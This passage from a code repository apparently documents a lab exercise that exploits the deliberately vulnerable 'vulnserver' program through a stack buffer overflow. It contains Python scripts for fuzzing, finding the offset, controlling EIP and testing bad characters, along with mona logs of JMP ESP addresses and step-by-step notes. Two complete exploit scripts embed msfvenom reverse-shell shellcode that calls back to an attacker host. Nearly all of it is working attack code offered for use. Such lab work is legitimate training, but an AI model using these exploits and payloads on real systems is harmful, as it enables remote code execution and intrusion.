data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | 
Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." 
) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("LTER "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 8 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 9 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 10 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 11 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 12 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 13 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 14 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 15 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 16 | 
"\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 17 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 18 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 19 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 20 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 21 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 22 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 23 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 24 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 25 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 26 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 27 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 28 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 29 | "\x09\x98\x82\x4d\x29\x89") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." 
) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xda\xc0\xbb\x46\xaa\xba\x69\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x52\x31\x58\x17\x03\x58\x17\x83\xae\x56\x58\x9c\xd2\x4f\x1f" 8 | "\x5f\x2a\x90\x40\xe9\xcf\xa1\x40\x8d\x84\x92\x70\xc5\xc8\x1e" 9 | "\xfa\x8b\xf8\x95\x8e\x03\x0f\x1d\x24\x72\x3e\x9e\x15\x46\x21" 10 | "\x1c\x64\x9b\x81\x1d\xa7\xee\xc0\x5a\xda\x03\x90\x33\x90\xb6" 11 | "\x04\x37\xec\x0a\xaf\x0b\xe0\x0a\x4c\xdb\x03\x3a\xc3\x57\x5a" 12 | "\x9c\xe2\xb4\xd6\x95\xfc\xd9\xd3\x6c\x77\x29\xaf\x6e\x51\x63" 13 | "\x50\xdc\x9c\x4b\xa3\x1c\xd9\x6c\x5c\x6b\x13\x8f\xe1\x6c\xe0" 14 | "\xed\x3d\xf8\xf2\x56\xb5\x5a\xde\x67\x1a\x3c\x95\x64\xd7\x4a" 15 | "\xf1\x68\xe6\x9f\x8a\x95\x63\x1e\x5c\x1c\x37\x05\x78\x44\xe3" 16 | "\x24\xd9\x20\x42\x58\x39\x8b\x3b\xfc\x32\x26\x2f\x8d\x19\x2f" 17 | "\x9c\xbc\xa1\xaf\x8a\xb7\xd2\x9d\x15\x6c\x7c\xae\xde\xaa\x7b" 18 | "\xd1\xf4\x0b\x13\x2c\xf7\x6b\x3a\xeb\xa3\x3b\x54\xda\xcb\xd7" 19 | "\xa4\xe3\x19\x77\xf4\x4b\xf2\x38\xa4\x2b\xa2\xd0\xae\xa3\x9d" 20 | "\xc1\xd1\x69\xb6\x68\x28\xfa\x79\xc4\x33\x69\x11\x17\x33\x89" 21 | "\x30\x9e\xd5\xfb\xa4\xf7\x4e\x94\x5d\x52\x04\x05\xa1\x48\x61" 22 | "\x05\x29\x7f\x96\xc8\xda\x0a\x84\xbd\x2a\x41\xf6\x68\x34\x7f" 23 | "\x9e\xf7\xa7\xe4\x5e\x71\xd4\xb2\x09\xd6\x2a\xcb\xdf\xca\x15" 24 | "\x65\xfd\x16\xc3\x4e\x45\xcd\x30\x50\x44\x80\x0d\x76\x56\x5c" 25 | "\x8d\x32\x02\x30\xd8\xec\xfc\xf6\xb2\x5e\x56\xa1\x69\x09\x3e" 26 | "\x34\x42\x8a\x38\x39\x8f\x7c\xa4\x88\x66\x39\xdb\x25\xef\xcd" 27 | "\xa4\x5b\x8f\x32\x7f\xd8\xaf\xd0\x55\x15\x58\x4d\x3c\x94\x05" 28 | "\x6e\xeb\xdb\x33\xed\x19\xa4\xc7\xed\x68\xa1\x8c\xa9\x81\xdb" 29 | 
"\x9d\x5f\xa5\x48\x9d\x75") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = 
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." 
) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 
| "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('LTER /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/index: -------------------------------------------------------------------------------- 1 | Vuln Server part 2 LTER 2 | 3 | 4 | A. Spiking =>generic_send_tcp 192.168.1.133 9999 spike.spk 0 0 5 | 6 | 7 | B. Fuzzing => buyffer crash at 2100 8 | 9 | 10 | C. Findinf offset=> 11 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100 12 | 13 | EIP Pointer-=> 386F4337 14 | 15 | D. Finding exject buffer buffer sdpace via offset 16 | 17 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2100 -q 386F4337 18 | 19 | Exject Match=> 2003 20 | 21 | 22 | E. 
Controlling EIP { Shellcode="A" * 2003 +"B" * 4 } 23 | 24 | F. Finding bad characters Shellcode="A" * 2003 +"B" * 4 + bad_char 25 | 26 | "\x00" + 27 | 28 | G: modules to find the exact ESP address / DLL 29 | { 30 | !mona modules => 31 | 32 | Address=0BADF00D [essfunc.dll] (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Address=0BADF00D [vulnserver.exe] (C:\Users\vinod\Desktop\Vul UFF\vulnserver.exe) 35 | 36 | } 37 | 38 | H. Finding JMP ESP modules for "FFE4" 39 | 40 | !mona find -s "\xff\xe4" -m essfunc.dll 41 | return address=> 42 | Address=625011AF 43 | Address=625011BB 44 | Address=625011C7 45 | Address=625011D3 46 | Address=625011DF 47 | Address=625011EB 48 | Address=625011F7 49 | Address=62501203 50 | Address=62501205 51 | 52 | I: Check for EIP control and breakpoint 53 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 54 | 55 | H: shell code 56 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 
offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3
Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 
5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." 
